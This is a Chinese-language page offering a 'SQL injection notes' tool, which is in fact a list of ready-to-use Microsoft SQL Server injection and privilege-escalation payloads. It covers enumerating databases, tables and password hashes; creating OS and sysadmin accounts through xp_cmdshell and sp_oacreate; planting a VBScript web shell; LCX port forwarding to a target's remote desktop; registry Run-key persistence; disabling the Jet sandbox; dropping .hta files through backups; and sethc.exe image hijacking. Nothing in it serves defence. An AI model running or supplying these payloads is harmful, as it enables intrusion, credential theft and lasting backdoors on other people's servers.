sql注入工具(菲哥哥注入語句筆記)1.2 綠色版

菲哥哥注入語句筆記是一款sql注入工具，它可以注入一些要注意的東西，Sql注射經(jīng)驗，寫成筆記了。

sql注入工具(菲哥哥注入語句筆記)功能介紹：

1.爆所有庫名

+union+select+name,filename,3,4,5+from+master.dbo.sysdatabases

//name數(shù)據(jù)庫名 filename 數(shù)據(jù)庫物理路徑

+union+select+name,filename,3,4,5+from+master.dbo.sysdatabases+where+and+dbid=x+filename>0

//爆破數(shù)據(jù)庫路徑 換dbid值就可以

+union+select+1,(select+name+from+master.dbo.sysdatabases+for+xml+path),3,4,5–

and 0<>db_name(n)–

n改成0,1,2,3……就可以跨庫

2.爆所有表名

+union+select+table_name,2,3,4,5+TABLE_CAtalog,table_schema+from+information_schema.tables–

//table_catalo 保存當前數(shù)據(jù)庫名稱，table_name 保存當前數(shù)據(jù)庫中所有表

+select+name,id,crdate,4,5+from+數(shù)據(jù)庫名.dbo.sysobjects+where+xtype=’u.+and+status>=0–

// name表名 id表的id xtype=’u’ u代表用戶自定義的表 crdate為數(shù)據(jù)庫的創(chuàng)建時間 ststus>=0

/+union+select+name,object_id,3,4,5+from sys.tables–

3.爆所有字段名

+union+select+name,id,3,4,5+from+數(shù)據(jù)庫名稱.dbo.syscolumns+where+xtype=167+and+id=5575058–

// id是在爆破表名時候的id值 syscolumns中的id和 sysobjects中的id主外鍵關系

+union+select+name+from+syscolumns+where+charindex(‘pass’,name)>0

//查詢含有 “pass”的字段

+union+SELECT name,2,3,4,5 FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = ‘yixiang_bizre’)

//查詢 yixiang_bizre 表中的所有字段

+union+select+table_name,column_name,3,4,5+from+information_schema.COLUMNS–

//table_name表名稱 column_name字段名

4.添加用戶

1、declare @o int;

2、exec master..sp_oacreate 'Shell.Application',@o out;

3、exec master..sp_oamethod @o,'ShellExecute',NULL,'cmd.exe','/c net user fuck fuck /add

5.判斷是不是SQL庫

and exists（select * from sysobjects）

6.所有賬戶名

+union+select+(select name+’||’+password_hash from+sys.sql_logins for xml path),2,3,4,5+from+sys.sql_logins //

7.加SQL賬戶

1、--創(chuàng)建個登陸mssql的帳號

2、;exec master.dbo.sp_addlogin name,pass;--

3、--把創(chuàng)建的mssql登陸帳號提升到sysadmin

4、;exec master.dbo.sp_addsrvrolemember name,sysadmin;--

8.啟動組寫入命令行和執(zhí)行

EXEC master.dbo.xp_regwrite ‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion\Run’,’help1′,’REG_SZ’,’cmd.exe /c net user test ptlove /add’-

9.LCX語句

;exec master..xp_cmdshell ‘D:\m目錄\lcx.exe -slave 本機ip 51 目標內(nèi)網(wǎng)ip 3389′–

//目標機器執(zhí)行

lcx.exe -listen 51 2007

//本機執(zhí)行 連接本機的的2007端口就可以了

10.win200爆目錄

xp_regread讀取HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots–

//獲取WEB路徑

11.恢復xp_cmdshell

;EXEC master.dbo.sp_addextendedproc ‘xp_cmdshell’,’e:\inetpub\wwwroot\xplog70.dll’

//把xplog70.dll文件給他上傳到e:\inetpub\wwwroot目錄下了

12.open數(shù)據(jù)

insert into OPENROWSET(‘SQLOLEDB’, ‘server=ip; uid=user;pwd=123456!’, ‘select c from cmd’) select username from test

//把 test是本地表，中username的值 插入到 遠程cmd表中的c字段里

13.判斷權限

1、+and+1=(select+IS_SRVROLEMEMBER('sysadmin'))--

2、//sa權限

3、and (select IS_MEMBER('db_owner'))=1--   //  dbo

4、and (select IS_MEMBER('public'))=1--  //public

14.DIR目錄

遍歷系統(tǒng)的目錄結構，分析結果并發(fā)現(xiàn)WEB虛擬目錄，先創(chuàng)建一個臨時表：

temp http://www.XXXX.com/FullStory.asp?id=1;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));

–接下來：我們可以利用xp_availablemedia來獲得當前所有驅(qū)動器,并存入temp表中：http://www.XXXX.com/FullStory.asp?id=1;insert temp exec master.dbo.xp_availablemedia;–? 我們可以通過查詢temp的內(nèi)容來獲得驅(qū)動器列表及相關信息或者利用xp_subdirs獲得子目錄列表,并存入temp表中：http://www.XXXX.com/FullStory.asp?id=1;insert into temp(id) exec master.dbo.xp_subdirs ‘c:\’;–?

我們還可以利用xp_dirtree獲得所有子目錄的目錄樹結構,并寸入temp表中：http://www.XXXX.com/FullStory.asp?id=1;insert into temp(id,num1) exec master.dbo.xp_dirtree ‘c:\’;–

這樣就可以成功的瀏覽到所有的目錄（文件夾）列表? 如果我們需要查看某個文件的內(nèi)容，可以通過執(zhí)行xp_cmdsell：;insert into temp(id) exec master.dbo.xp_cmdshell ‘type c:\web\index.asp’;–?

使用’bulk insert’語法可以將一個文本文件插入到一個臨時表中。

如：bulk insert temp(id) from ‘c:\inetpub\wwwroot\index.asp’ 瀏覽temp就可以看到index.asp文件的內(nèi)容了！通過分析各種ASP文件，可以得到大量系統(tǒng)信息，WEB建設與管理信息，甚至可以得到SA帳號的連接密碼。

15.判斷站庫分離

+and+host_name()==@@servername--  //判斷站庫是否分離

16.存儲總結

xp_availablemedia 顯示系統(tǒng)上可用的盤符’C:’ xp_availablemedia

xp_enumgroups 列出當前系統(tǒng)的使用群組及其說明 xp_enumgroups

xp_enumdsn 列出系統(tǒng)上已經(jīng)設置好的ODBC數(shù)據(jù)源名稱 xp_enumdsn

xp_dirtree 顯示某個目錄下的子目錄與文件架構 xp_dirtree ‘C:\inetpub\wwwroot\’

xp_getfiledetails 獲取某文件的相關屬性 xp_getfiledetails ‘C:\inetpub\wwwroot.asp’

dbp.xp_makecab 將目標計算機多個檔案壓縮到某個檔案里所壓縮的檔案都可以接在參數(shù)的后面用豆號隔開

dbp.xp_makecab’C:\lin.cab’,’evil’,1,’C:\inetpub\mdb.asp’

xp_unpackcab 解壓縮 xp_unpackcab ‘C:\hackway.cab’,’C:\temp’,1

xp_ntsec_enumdomains 列出服務器域名 xp_ntsec_enumdomains

xp_servicecontrol 停止或者啟動某個服務 xp_servicecontrol ‘stop’,’schedule’

xp_terminate_process 用pid來停止某個執(zhí)行中的程序 xp_terminate_process 123

dbo.xp_subdirs 只列某個目錄下的子目錄 dbo.xp_subdirs ‘C:’

17.判斷xp_cmdshell

+and+1=(select+count(*)+FROM+master.dbo.sysobjects+where+xtype+= ‘X’+AND+name+= ‘xp_cmdshell’)

18.判斷系統(tǒng)為win2003

And+charindex('5.3',@@verisdn)

19.echo 寫shell

;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("^)^</script^> >c:\\mu.asp'-

20.停掉服務

exec master..xp_servicecontrol ‘stop’,’schedule’

exec master..xp_servicecontrol ‘start’,’schedule’

有多少刪減。另外添加幾句個人經(jīng)常用到的SQL注入和提權的語句

當xp_cmshell被刪除或者無法使用的情況，我們不妨試試利用SP_OACreate和SP_OAMETHOD調(diào)用系統(tǒng)wscript.shell執(zhí)行系統(tǒng)命令。

Declare @runshell INT

Exec SP_OACreate ‘wscript.shell’,@runshell out

Exec SP_OAMeTHOD @runshell,’run’,null,’net user lengf lengf /add’

當這些都失敗了，試試關閉系統(tǒng)沙盒模式，它在注冊表的位置是

HKEY_LOCAL_MACHINE\Software\Microsoft\Jet\4.0\Engine\SandBoxMode

默認鍵值為2，即只在Access的模式下開啟沙盒模式，對應的鍵值是

0 — 在任何所有者中禁止啟用安全模式

1 –為僅在允許范圍內(nèi)

2 –必須在access模式下

3 –完全開啟

我們要將其設置為0就可以關閉了，通過SQL語句實現(xiàn)

Exec master.dbo.xp_regwrite ‘HKEY_LOCAL_MACHINE,’\Software\Microsoft\Jet\4.0\Engine\’,’SandBoxMode’,’REG_DWORD’,0

執(zhí)行關閉成功后就可以執(zhí)行系統(tǒng)命令

select * from OpenRowSet(‘Microsoft.Jet.OLEDB.4.0′,’;DataBase=c:\windows\system32\ias\ias.mdb’,’select shell(“net user lengf lengf /add”)’)

上面是提權思路。另外提下兩種備份：

(1)Log備份(hta)

alert database [dbname] set RECOVERY FULL–

create table cmd(a image)–

backup log [dbname] to disk=’c:\hta’ with init–

insert into cmd(a) values(‘[command]‘)–

backup log [dbname] to disk=’系統(tǒng)啟動目錄\hello.hta’–

drop table cmd–

(2)差異備份

backup database [dbname] to disk=’c:\db.bak’–

create table cmd(cmd image)–

insert into cmd(cmd) values(‘[command]‘)–

backup database [dbname] to disk=’系統(tǒng)啟動目錄\hello.hta’ WITH DIFFERENTIAL FORMAT–

drop table cmd–

經(jīng)驗告訴我，將你要執(zhí)行的command轉(zhuǎn)換成十六進制成功率會比較高，但是這個比較被動。

另外就是可以通過注冊表添加run啟動項添加用戶命令，這種也是被動，要等服務器重啟。

看了這個工具，覺得還缺少一個很使用的方法，那就是映像劫持，位于注冊表位置：

HKEY_LOACAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

在這個鍵下面有一個Debugger的參數(shù)，如果不為空，就會處理。添加映像劫持方法的SQL語句如下：

exec Master.dbo.xp_regWrite ‘HKEY_LOACAL_MACHINE’,’Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe’,’debugger’,’REG_SZ’,’c:\windows\system32\cmd.exe’